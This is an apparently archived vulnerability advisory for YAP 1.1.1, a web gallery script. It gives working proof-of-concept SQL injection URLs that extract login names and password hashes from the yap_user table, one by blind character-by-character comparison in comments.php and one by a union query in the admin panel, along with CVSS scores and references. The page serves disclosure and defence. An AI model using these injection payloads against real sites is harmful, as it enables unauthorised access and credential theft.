YAP 1.1.1 Blind SQL Injection/SQL Injection

2009.03.21
Credit: SirGod
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

####################################################################################################### [+] YAP 1.1.1 Blind SQL Injection/SQL Injection [+] Discovered By SirGod [+] www.mortal-team.org [+] www.h4cky0u.org ######################################################################################################## [+] Blind SQL Injection The default prefix for database tables is "yap_" .But can be changed at installation. PoC : http://127.0.0.1/[path]/comments.php?image_id=1 and ascii(substring((SELECT concat(login,0x3a,pass) from yap_user limit 0,1),1,1))>97 First character of the username is char(97) , is "a" . http://127.0.0.1/[path]/comments.php?image_id=1 and ascii(substring((SELECT concat(login,0x3a,pass) from yap_user limit 0,1),2,1))>100 Second character of the username is char(100) ,is "d" . And so on...Change the limit to go to the next char. [+] SQL Injection - Need to be logged in as administrator. http://127.0.0.1/[path]/admin/index.php?page=users_modif&action=modif&user=null union all select concat_ws(0x3a,login,pass),2 from yap_user where id=1-- #########################################################################################################

References:

http://www.milw0rm.com/exploits/8217
http://osvdb.org/52762
http://osvdb.org/52761


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top